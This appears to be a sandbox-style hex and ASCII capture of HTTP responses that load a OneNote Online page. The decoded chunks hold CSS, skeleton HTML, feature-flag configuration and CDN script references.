                                                2022-10-03 13:38:17 UTC114INData Raw: 31 30 30 36 0d 0a 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 32 64 32 64 32 3b 7d 20 2e 73 6b 65 6c 65 74 61 6c 50 6f 73 69 74 69 6f 6e 52 65 77 72 69 74 65 4e 61 76 70 61 6e 65 54 69 74 6c 65 20 7b 68 65 69 67 68 74 3a 34 34 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 32 64 32 64 32 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 39 66 38 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 32 64 32 64 32 3b 7d 20 2e 73 6b 65 6c 65 74 61 6c 50 61 67 65 43 6f 6c 75 6d 6e 53 68 61 64 6f 77 20 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                Data Ascii: 1006; border-top:1px solid #d2d2d2;} .skeletalPositionRewriteNavpaneTitle {height:44px;border-bottom:1px solid #d2d2d2;display:inline-flex;position:relative; background-color: #faf9f8; border-top:1px solid #d2d2d2;} .skeletalPageColumnShadow {background
                                                2022-10-03 13:38:17 UTC118INData Raw: 32 30 30 30 0d 0a 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 20 40 6b 65 79 66 72 61 6d 65 73 20 61 6e 69 6d 61 74 65 57 61 76 65 20 7b 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 31 36 2e 36 36 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 33 33 2e 33 33 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 36 36 2e 36 36 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 38 33 2e 33 33 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 7d 20 23 6c 6f 61 64 5f 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f
                                                Data Ascii: 2000 !important;} @keyframes animateWave {0%{opacity:1;}16.66%{opacity:0;}33.33%{opacity:1;}50%{opacity:1;}66.66%{opacity:0;}83.33%{opacity:1;}100%{opacity:1;}} #load_img{width:100%;height:100%;position:absolute;text-align:center;display:flex;justify-co
                                                2022-10-03 13:38:17 UTC126INData Raw: 32 30 30 30 0d 0a 68 6f 6c 64 65 72 20 2e 64 6f 63 75 6d 65 6e 74 54 69 74 6c 65 2d 37 31 7b 63 6f 6c 6f 72 3a 23 36 31 36 31 36 31 7d 2e 56 4e 65 78 74 48 65 61 64 65 72 50 6c 61 63 65 68 6f 6c 64 65 72 20 2e 64 6f 63 75 6d 65 6e 74 54 69 74 6c 65 2d 37 31 7b 63 6f 6c 6f 72 3a 23 32 34 32 34 32 34 7d 2e 56 4e 65 78 74 48 65 61 64 65 72 50 6c 61 63 65 68 6f 6c 64 65 72 44 61 72 6b 4d 6f 64 65 20 2e 64 6f 63 75 6d 65 6e 74 54 69 74 6c 65 2d 37 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 55 6e 69 66 69 65 64 55 69 48 6f 73 74 48 65 61 64 65 72 50 6c 61 63 65 68 6f 6c 64 65 72 20 2e 64 6f 63 75 6d 65 6e 74 54 69 74 6c 65 2d 37 31 7b 63 6f 6c 6f 72 3a 23 32 34 32 34 32 34 7d 2e 63 68 65 76 72 6f 6e 44 6f 77 6e 2d 37 32 7b 77 69 64 74 68 3a 31 30 70 78 3b 68 65
                                                Data Ascii: 2000holder .documentTitle-71{color:#616161}.VNextHeaderPlaceholder .documentTitle-71{color:#242424}.VNextHeaderPlaceholderDarkMode .documentTitle-71{color:#fff}.UnifiedUiHostHeaderPlaceholder .documentTitle-71{color:#242424}.chevronDown-72{width:10px;he
                                                2022-10-03 13:38:17 UTC134INData Raw: 32 30 30 30 0d 0a 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 69 64 3d 22 53 6b 65 6c 65 74 61 6c 4e 61 76 70 61 6e 65 54 61 62 22 20 63 6c 61 73 73 3d 22 73 6b 65 6c 65 74 61 6c 50 6f 73 69 74 69 6f 6e 52 65 77 72 69 74 65 4e 61 76 70 61 6e 65 54 61 62 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 6b 65 6c 65 74 61 6c 54 69 74 6c 65 41 6e 64 43 6f 6c 75 6d 6e 73 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 6b 65 6c 65 74 61 6c 50 6f 73 69 74 69 6f 6e 52 65 77 72 69 74 65 4e 61 76 70 61 6e 65 54 69 74 6c 65 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 69 64 3d 22
                                                Data Ascii: 2000esentation"><span id="SkeletalNavpaneTab" class="skeletalPositionRewriteNavpaneTab" role="presentation"></span><span class="skeletalTitleAndColumns" role="presentation"><span class="skeletalPositionRewriteNavpaneTitle" role="presentation"><span id="
                                                2022-10-03 13:38:17 UTC142INData Raw: 32 30 30 30 0d 0a 61 6c 43 61 6e 76 61 73 42 6f 78 55 6e 69 74 20 73 6b 65 6c 65 74 61 6c 43 61 6e 76 61 73 53 65 63 6f 6e 64 43 6f 6c 75 6d 6e 55 6e 69 74 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 73 74 79 6c 65 3d 22 74 6f 70 3a 34 32 34 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 32 2e 34 30 31 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 34 73 3b 77 69 64 74 68 3a 33 39 33 70 78 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 76 61 72 20 67 5f 73 70 6c 61 73 68 53 63 72 65 65 6e 53 68 6f 77 6e 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 65 6e 64
                                                Data Ascii: 2000alCanvasBoxUnit skeletalCanvasSecondColumnUnit" role="presentation" style="top:424px;animation-delay:2.401s;animation-duration:4s;width:393px"></span></span></span><script type="text/javascript"> var g_splashScreenShown = new Date(); </script><![end
                                                2022-10-03 13:38:17 UTC150INData Raw: 32 30 30 30 0d 0a 56 65 72 73 69 6f 6e 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 57 41 43 44 61 74 61 63 65 6e 74 65 72 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 47 45 55 32 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 55 73 65 72 41 67 65 6e 74 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 4d 6f 7a 69 6c 6c 61 5c 75 30 30 32 66 35 2e 30 20 5c 75 30 30 32 38 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 5c 75 30 30 32 39 20 41 70 70 6c 65 57 65 62 4b 69 74 5c 75 30 30 32 66 35 33 37 2e 33 36 20 5c 75 30 30 32 38 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 5c 75 30 30 32 39 20 43 68 72 6f 6d 65 5c 75 30 30 32 66 31 30 34 2e 30 2e 30 2e 30 20 53 61
                                                Data Ascii: 2000Version\u0022:\u002216.0.15707.41015\u0022,\u0022WACDatacenter\u0022:\u0022GEU2\u0022,\u0022UserAgent\u0022:\u0022Mozilla\u002f5.0 \u0028Windows NT 10.0; Win64; x64\u0029 AppleWebKit\u002f537.36 \u0028KHTML, like Gecko\u0029 Chrome\u002f104.0.0.0 Sa
                                                2022-10-03 13:38:17 UTC158INData Raw: 32 30 30 30 0d 0a 37 33 32 34 62 34 65 36 34 39 36 37 61 33 31 61 35 63 32 65 32 37 36 37 61 32 61 30 27 2c 42 61 73 65 44 6f 63 4c 6f 67 49 64 3a 20 27 39 39 32 62 32 65 63 37 62 62 34 62 34 38 61 65 64 38 63 37 34 37 35 30 65 31 64 39 66 61 61 66 33 36 30 33 66 39 31 36 33 39 63 61 34 37 30 38 61 37 34 35 63 66 38 62 39 31 66 36 63 35 64 30 27 2c 42 61 73 65 44 6f 63 53 65 72 76 65 72 49 64 3a 20 27 61 36 64 65 34 36 64 38 2d 32 30 61 61 2d 34 33 31 61 2d 62 64 64 34 2d 31 34 36 30 62 65 39 34 61 32 36 32 27 2c 53 6e 61 63 6b 62 61 72 4e 61 76 50 61 6e 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 54 77 6f 50 61 6e 65 4e 61 76 50 61 6e 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 43 6f 6e 66 69 72 6d 61 74 69
                                                Data Ascii: 20007324b4e64967a31a5c2e2767a2a0',BaseDocLogId: '992b2ec7bb4b48aed8c74750e1d9faaf3603f91639ca4708a745cf8b91f6c5d0',BaseDocServerId: 'a6de46d8-20aa-431a-bdd4-1460be94a262',SnackbarNavPaneIsEnabled: 'true',OneNoteTwoPaneNavPaneIsEnabled: 'true',Confirmati
                                                2022-10-03 13:38:17 UTC166INData Raw: 36 65 63 0d 0a 6f 6e 65 6e 6f 74 65 2d 31 35 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 3a 34 34 33 2f 6f 2f 73 2f 68 35 41 44 33 34 42 35 41 33 33 36 37 44 46 42 46 5f 41 70 70 5f 53 63 72 69 70 74 73 2f 31 30 33 36 2f 4f 6e 65 4e 6f 74 65 49 6e 74 6c 2e 6a 73 22 5d 3d 68 69 67 68 52 65 73 54 69 6d 65 53 74 61 6d 70 28 29 3b 5f 62 42 2e 73 65 6e 64 52 65 73 6f 75 72 63 65 53 75 63 63 65 73 73 28 22 68 74 74 70 73 3a 2f 2f 63 31 2d 6f 6e 65 6e 6f 74 65 2d 31 35 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 3a 34 34 33 2f 6f 2f 73 2f 68 35 41 44 33 34 42 35 41 33 33 36 37 44 46 42 46 5f 41 70 70 5f 53 63 72 69 70 74 73 2f 31 30 33 36 2f 4f 6e 65 4e 6f 74 65 49 6e 74 6c 2e 6a 73 22 29 3b 27 20 6f 6e 65 72 72 6f 72 3d 27 5f 62 42 2e 73 65 6e 64 52 65 73 6f
                                                Data Ascii: 6econenote-15.cdn.office.net:443/o/s/h5AD34B5A3367DFBF_App_Scripts/1036/OneNoteIntl.js"]=highResTimeStamp();_bB.sendResourceSuccess("https://c1-onenote-15.cdn.office.net:443/o/s/h5AD34B5A3367DFBF_App_Scripts/1036/OneNoteIntl.js");' onerror='_bB.sendReso
                                                2022-10-03 13:38:17 UTC168INData Raw: 66 63 37 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 69 64 3d 22 66 6f 72 6d 31 22 20 6f 6e 73 75 62 6d 69 74 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 22 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 70 4e 65 74 48 69 64 64 65 6e 22 3e 0d 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 69 64 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6e 74 61 69 6e 65 72 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74
                                                Data Ascii: fc7<form method="post" action="/" id="form1" onsubmit="return false;" style="height:inherit"><div class="aspNetHidden"><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /></div><div id="ApplicationContainer" style="height:inherit
                                                2022-10-03 13:38:17 UTC172INData Raw: 32 30 30 30 0d 0a 6e 74 20 4f 6e 6c 69 6e 65 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 48 6f 73 74 44 61 74 61 63 65 6e 74 65 72 48 69 6e 74 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 69 6e 73 61 63 65 6e 74 72 65 2d 6d 79 2e 73 68 61 72 65 70 6f 69 6e 74 2e 63 6f 6d 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 53 65 72 76 65 72 44 6f 63 49 64 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 61 36 64 65 34 36 64 38 2d 32 30 61 61 2d 34 33 31 61 2d 62 64 64 34 2d 31 34 36 30 62 65 39 34 61 32 36 32 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 52 69 6e 67 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 35 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 41 75 64 69 65 6e 63 65 47 72 6f 75 70 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 50 72 6f 64 75 63 74 69 6f 6e 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 53 65
                                                Data Ascii: 2000nt Online\u0022,\u0022HostDatacenterHint\u0022:\u0022insacentre-my.sharepoint.com\u0022,\u0022ServerDocId\u0022:\u0022a6de46d8-20aa-431a-bdd4-1460be94a262\u0022,\u0022Ring\u0022:\u00225\u0022,\u0022AudienceGroup\u0022:\u0022Production\u0022,\u0022Se
                                                2022-10-03 13:38:17 UTC180INData Raw: 31 30 33 32 0d 0a 51 35 4e 7a 6b 34 59 7a 4a 6d 59 32 4a 69 4f 54 73 37 56 48 4a 31 5a 54 73 37 4f 7a 41 37 5a 54 63 77 4d 7a 5a 69 59 54 41 74 4e 44 41 77 4e 43 30 31 4d 44 41 77 4c 54 51 33 4d 44 51 74 4f 47 4d 33 4f 54 63 33 5a 6a 6b 32 4d 32 4d 35 49 6e 30 5c 75 30 30 32 35 32 45 45 57 62 36 36 4c 44 63 50 4b 39 6f 72 38 36 53 59 69 58 45 6e 53 38 58 38 35 67 6f 5c 75 30 30 32 35 35 46 47 46 36 6a 72 79 74 6d 4e 65 5c 75 30 30 32 35 32 44 56 4d 30 44 50 31 78 65 64 6b 64 48 38 5c 75 30 30 32 35 32 44 50 37 6d 61 51 6b 69 47 56 31 75 6f 4b 6e 32 51 33 50 34 4b 30 37 57 38 47 58 50 67 59 5a 35 79 38 66 58 7a 79 77 71 6c 4a 79 6b 6b 6f 4a 7a 43 4a 50 52 41 78 36 4f 5c 75 30 30 32 35 35 46 63 42 69 5a 73 7a 77 78 44 75 31 72 4a 74 67 6a 53 54 6c 64 73 64
                                                Data Ascii: 1032Q5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0\u00252EEWb66LDcPK9or86SYiXEnS8X85go\u00255FGF6jrytmNe\u00252DVM0DP1xedkdH8\u00252DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O\u00255FcBiZszwxDu1rJtgjSTldsd
                                                2022-10-03 13:38:17 UTC184INData Raw: 32 30 30 30 0d 0a 68 45 64 6f 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 4f 6e 65 4e 6f 74 65 52 65 61 63 74 50 61 72 61 67 72 61 70 68 44 69 61 6c 6f 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 4f 6e 65 4e 6f 74 65 52 65 61 63 74 4c 61 6e 67 75 61 67 65 44 69 61 6c 6f 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 4f 6e 65 4e 6f 74 65 50 61 67 65 4c 61 79 6f 75 74 4d 65 74 61 64 61 74 61 4c 6f 67 67 69 6e 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 50 61 67 65 4c 65 76 65 6c 43 6f 6e 76 65 72 73 61 74 69 6f 6e 49 6e 54 65 61 6d 73 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 49 6e 73 74 61 6e 74 4f 6e 65 4e 6f 74 65 50 75 62 6c 69 73 68 50 61 67 65 45 6e 61 62 6c 65
                                                Data Ascii: 2000hEdogIsEnabled: 'false',OneNoteReactParagraphDialogIsEnabled: 'false',OneNoteReactLanguageDialogIsEnabled: 'false',OneNotePageLayoutMetadataLoggingIsEnabled: 'true',OneNotePageLevelConversationInTeamsIsEnabled: 'true',InstantOneNotePublishPageEnable
                                                2022-10-03 13:38:17 UTC192INData Raw: 32 30 30 30 0d 0a 6d 65 6e 74 4e 61 6d 65 49 6e 4a 65 77 65 6c 49 6e 66 6f 4d 65 6e 75 49 73 45 6e 61 62 6c 65 64 3a 20 27 46 61 6c 73 65 27 2c 44 6f 63 78 53 61 76 65 4d 6f 6e 69 74 6f 72 54 65 6c 65 6d 65 74 72 79 49 6e 66 6f 45 6e 61 62 6c 65 64 3a 20 27 54 72 75 65 27 2c 44 6f 4e 6f 74 48 69 64 65 49 66 72 61 6d 65 73 4f 6e 44 69 61 6c 6f 67 53 68 6f 77 3a 20 27 46 61 6c 73 65 27 2c 44 6f 6e 74 53 74 6f 70 54 61 73 6b 4d 61 6e 61 67 65 72 4f 6e 43 72 61 73 68 49 73 45 6e 61 62 6c 65 64 3a 20 27 54 72 75 65 27 2c 45 63 73 43 68 61 6e 67 65 47 61 74 65 73 4c 6f 67 73 46 72 6f 6d 41 46 72 61 6d 65 77 6f 72 6b 49 73 45 6e 61 62 6c 65 64 3a 20 27 46 61 6c 73 65 27 2c 45 64 67 65 53 79 73 74 65 6d 43 6c 69 70 62 6f 61 72 64 53 65 6c 65 63 74 69 6f 6e 45 6e
                                                Data Ascii: 2000mentNameInJewelInfoMenuIsEnabled: 'False',DocxSaveMonitorTelemetryInfoEnabled: 'True',DoNotHideIframesOnDialogShow: 'False',DontStopTaskManagerOnCrashIsEnabled: 'True',EcsChangeGatesLogsFromAFrameworkIsEnabled: 'False',EdgeSystemClipboardSelectionEn
                                                2022-10-03 13:38:17 UTC200INData Raw: 32 30 30 30 0d 0a 30 30 32 32 3a 20 5c 75 30 30 32 32 63 66 65 37 39 33 32 34 2d 66 66 62 63 2d 34 34 33 31 2d 61 35 38 66 2d 31 33 61 33 38 32 65 65 32 61 32 34 5c 75 30 30 32 32 2c 5c 72 5c 6e 20 20 20 20 5c 75 30 30 32 32 41 75 67 4c 6f 6f 70 5c 75 30 30 32 32 3a 20 5c 75 30 30 32 32 32 61 62 64 63 38 30 36 2d 65 30 39 31 2d 34 34 39 35 2d 39 62 31 30 2d 62 30 34 64 39 33 63 33 66 30 34 30 5c 75 30 30 32 32 2c 5c 72 5c 6e 20 20 20 20 5c 75 30 30 32 32 42 61 79 42 72 69 64 67 65 5c 75 30 30 32 32 3a 20 5c 75 30 30 32 32 37 30 33 65 62 61 31 37 2d 34 64 37 33 2d 34 33 30 30 2d 39 34 30 35 2d 62 39 33 64 39 63 63 62 30 61 31 35 5c 75 30 30 32 32 2c 5c 72 5c 6e 20 20 20 20 5c 75 30 30 32 32 4c 6f 6b 69 5c 75 30 30 32 32 3a 20 5c 75 30 30 32 32 62 32 33 64
                                                Data Ascii: 20000022: \u0022cfe79324-ffbc-4431-a58f-13a382ee2a24\u0022,\r\n \u0022AugLoop\u0022: \u00222abdc806-e091-4495-9b10-b04d93c3f040\u0022,\r\n \u0022BayBridge\u0022: \u0022703eba17-4d73-4300-9405-b93d9ccb0a15\u0022,\r\n \u0022Loki\u0022: \u0022b23d
                                                2022-10-03 13:38:17 UTC208INData Raw: 32 30 30 30 0d 0a 73 74 65 6d 43 6c 69 70 62 6f 61 72 64 41 63 63 65 73 73 46 6f 72 43 6f 70 79 43 75 74 3a 20 27 74 72 75 65 27 2c 53 68 6f 75 6c 64 48 69 64 65 54 6f 6f 6c 62 61 72 4f 6e 56 69 65 77 65 72 52 65 64 69 72 65 63 74 3a 20 27 46 61 6c 73 65 27 2c 53 68 6f 75 6c 64 49 6e 69 74 43 6f 6d 6d 6f 6e 50 6f 6c 69 63 79 50 61 63 6b 61 67 65 3a 20 27 66 61 6c 73 65 27 2c 53 68 6f 75 6c 64 4c 6f 67 4f 6e 43 6f 6e 74 65 6e 74 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3a 20 27 46 61 6c 73 65 27 2c 53 68 6f 75 6c 64 4c 6f 67 4f 6e 48 6f 73 74 53 75 62 73 63 72 69 70 74 69 6f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3a 20 27 46 61 6c 73 65 27 2c 53 68 6f 75 6c 64 4d 65 72 67 65 41 70 70 54 6f 67 67 6c 65 42 75 74 74 6f 6e 4d 65 6e 75 49 74 65 6d 53 74 79 6c 65 73
                                                Data Ascii: 2000stemClipboardAccessForCopyCut: 'true',ShouldHideToolbarOnViewerRedirect: 'False',ShouldInitCommonPolicyPackage: 'false',ShouldLogOnContentNotification: 'False',ShouldLogOnHostSubscriptionNotification: 'False',ShouldMergeAppToggleButtonMenuItemStyles
                                                2022-10-03 13:38:17 UTC216INData Raw: 32 30 30 30 0d 0a 32 38 35 37 32 35 31 2c 35 30 34 30 36 38 36 36 2c 35 30 34 33 31 39 36 39 2c 35 30 36 31 39 37 32 36 2c 35 30 36 32 32 36 38 35 2c 35 30 36 32 32 36 38 37 2c 35 31 34 35 31 36 31 33 2c 35 31 34 39 32 31 37 30 2c 35 31 35 30 34 30 38 33 2c 35 31 36 36 37 30 31 30 2c 33 30 36 32 33 30 39 33 39 2c 33 30 36 39 37 38 38 33 34 2c 35 32 30 39 37 39 38 34 37 2c 35 32 31 30 30 37 33 31 35 2c 35 32 31 37 34 39 38 35 35 2c 35 32 34 31 35 30 31 36 34 2c 35 32 34 38 38 33 31 30 37 2c 35 32 34 38 38 33 31 33 36 2c 35 32 34 38 38 33 31 33 38 2c 35 33 37 31 35 39 34 39 39 2c 35 33 37 31 36 39 39 33 37 2c 35 33 38 35 34 32 37 39 32 2c 35 33 38 35 34 33 35 38 37 2c 35 33 39 30 37 35 36 37 38 2c 35 33 39 38 37 34 37 32 33 2c 35 34 30 33 37 38 36 39 39 2c
                                                Data Ascii: 20002857251,50406866,50431969,50619726,50622685,50622687,51451613,51492170,51504083,51667010,306230939,306978834,520979847,521007315,521749855,524150164,524883107,524883136,524883138,537159499,537169937,538542792,538543587,539075678,539874723,540378699,
                                                2022-10-03 13:38:17 UTC224INData Raw: 32 30 30 30 0d 0a 62 6c 65 46 69 72 73 74 50 61 72 74 79 53 44 58 45 72 72 6f 72 4d 65 73 73 61 67 65 73 3a 20 27 74 72 75 65 27 2c 4f 66 66 69 63 65 41 64 64 69 6e 45 6e 61 62 6c 65 49 6e 73 65 72 74 44 69 61 6c 6f 67 41 63 63 65 73 73 69 62 69 6c 69 74 79 46 69 78 3a 20 27 74 72 75 65 27 2c 4f 66 66 69 63 65 4f 6e 6c 69 6e 65 43 68 72 6f 6d 65 45 78 74 65 6e 73 69 6f 6e 49 64 3a 20 27 6e 64 6a 70 6e 6c 61 64 63 61 6c 6c 6d 6a 65 6d 6c 62 61 65 62 66 61 64 65 63 66 68 6b 65 70 62 27 2c 4f 66 66 69 63 65 4f 6e 6c 69 6e 65 43 68 72 6f 6d 65 45 78 74 65 6e 73 69 6f 6e 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 53 70 65 6c 6c 65 72 4d 65 74 72 69 63 49 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c
                                                Data Ascii: 2000bleFirstPartySDXErrorMessages: 'true',OfficeAddinEnableInsertDialogAccessibilityFix: 'true',OfficeOnlineChromeExtensionId: 'ndjpnladcallmjemlbaebfadecfhkepb',OfficeOnlineChromeExtensionIsEnabled: 'true',OneSpellerMetricInstrumentationIsEnabled: 'fal
                                                2022-10-03 13:38:17 UTC233INData Raw: 32 30 30 30 0d 0a 65 50 72 69 6e 74 6f 75 74 53 63 65 6e 61 72 69 6f 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 4d 75 6c 74 69 43 6f 6c 75 6d 6e 4e 61 76 50 61 6e 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 4e 61 76 56 69 65 77 45 78 70 61 6e 64 43 6f 6c 6c 61 70 73 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 4e 61 76 56 69 65 77 50 69 6e 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 4e 61 76 56 69 65 77 50 69 6e 53 61 76 65 54 6f 43 6f 6f 6b 69 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 4f 6e 65 4e 6f 74 65 46 69 72 73 74 52 75 6e 54 72 65 61 74 6d 65 6e 74 44 61 74 61 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f
                                                Data Ascii: 2000ePrintoutScenario: 'true',OneNoteMultiColumnNavPaneIsEnabled: 'true',OneNoteNavViewExpandCollapseIsEnabled: 'true',OneNoteNavViewPinIsEnabled: 'true',OneNoteNavViewPinSaveToCookieIsEnabled: 'false',OneNoteFirstRunTreatmentDataIsEnabled: 'true',OneNo
                                                2022-10-03 13:38:17 UTC241INData Raw: 32 30 30 30 0d 0a 4f 6e 65 4e 6f 74 65 2e 52 65 66 72 65 73 68 2e 63 73 73 27 2c 45 64 69 74 53 75 72 66 61 63 65 43 53 53 48 61 73 68 65 64 55 52 4c 3a 20 27 68 74 74 70 73 3a 5c 75 30 30 32 66 5c 75 30 30 32 66 63 31 2d 6f 6e 65 6e 6f 74 65 2d 31 35 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 3a 34 34 33 5c 75 30 30 32 66 6f 5c 75 30 30 32 66 73 5c 75 30 30 32 66 68 38 31 36 41 30 46 34 32 41 32 42 46 34 37 33 32 5f 72 65 73 6f 75 72 63 65 73 5c 75 30 30 32 66 31 30 33 36 5c 75 30 30 32 66 45 64 69 74 53 75 72 66 61 63 65 2e 63 73 73 27 2c 4f 6e 65 4e 6f 74 65 41 75 74 6f 53 77 69 74 63 68 54 6f 54 79 70 65 57 68 69 6c 65 49 6e 6b 69 6e 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 74 72 75 65 27 2c 4f 6e 65 4e 6f 74 65 53 75 62 73 74 72 61 74 65 53 49 47 53
                                                Data Ascii: 2000OneNote.Refresh.css',EditSurfaceCSSHashedURL: 'https:\u002f\u002fc1-onenote-15.cdn.office.net:443\u002fo\u002fs\u002fh816A0F42A2BF4732_resources\u002f1036\u002fEditSurface.css',OneNoteAutoSwitchToTypeWhileInkingIsEnabled: 'true',OneNoteSubstrateSIGS
                                                2022-10-03 13:38:17 UTC249INData Raw: 32 30 30 30 0d 0a 61 6c 6d 65 6e 75 74 3b 6f 6e 65 6e 6f 74 65 64 65 6c 61 79 6c 6f 61 64 68 61 6d 6d 65 72 6a 73 3b 6f 6e 68 77 72 62 72 6f 77 73 65 72 2d 74 72 65 61 74 6d 65 6e 74 3b 6f 6e 65 6e 6f 74 65 2d 6f 6e 65 6e 6f 74 65 75 73 65 72 69 6e 66 6f 74 6f 6f 73 69 69 73 65 6e 61 62 6c 65 64 2d 74 72 65 61 74 6d 65 6e 74 3b 33 34 37 63 69 34 34 32 3b 6f 6e 65 6e 6f 74 65 2d 72 65 6d 6f 76 65 63 6f 6d 6d 6f 6e 6a 73 64 65 70 65 6e 64 65 6e 63 79 2d 74 72 65 61 74 6d 65 6e 74 3b 6f 6e 69 73 73 38 39 31 3b 33 38 37 66 38 39 35 37 3b 6f 6e 65 6e 6f 74 65 2d 6d 6f 76 65 65 64 75 63 61 63 68 65 73 74 6f 6c 73 2d 74 72 65 61 74 6d 65 6e 74 3b 6f 6e 65 6e 6f 74 65 2d 69 6e 6b 69 6e 67 